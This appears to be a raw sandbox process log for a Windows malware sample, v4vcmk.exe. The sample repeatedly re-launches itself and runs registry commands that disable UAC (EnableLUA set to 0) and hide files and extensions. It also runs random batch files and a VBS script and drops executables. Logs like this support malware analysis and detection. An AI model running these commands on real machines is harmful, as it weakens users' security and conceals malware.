C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\JQQcwosc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zOwYoUMg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\Mssocsgc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\sKcwwsUc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QEMMMwkc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\gCwcEIAU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\CGwoMIko.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\kYAoAkwU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\IIsgMQIw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\hyYMIkgw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NAAMkMIk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\HYIQEwcM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\jugkogQE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VmYcUgsM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\viMIsUUs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\SQMwcsUM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KuIIAocs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QmYkQwcs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\YYMckAsg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tskkAAUA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\HcwMEoQo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\jyMMUUYk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\PKQscwcE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZeMMUgsA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\mQUgQkwg\TIkMIsss.exe

"C:\Users\Admin\mQUgQkwg\TIkMIsss.exe"

C:\ProgramData\xcIAYMoI\YioMwUEg.exe

"C:\ProgramData\xcIAYMoI\YioMwUEg.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\jwEYIsMI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 36

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1472 -s 36

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWgUMcMI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\TsEocIQA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ssoAgcUs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KQAscYos.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

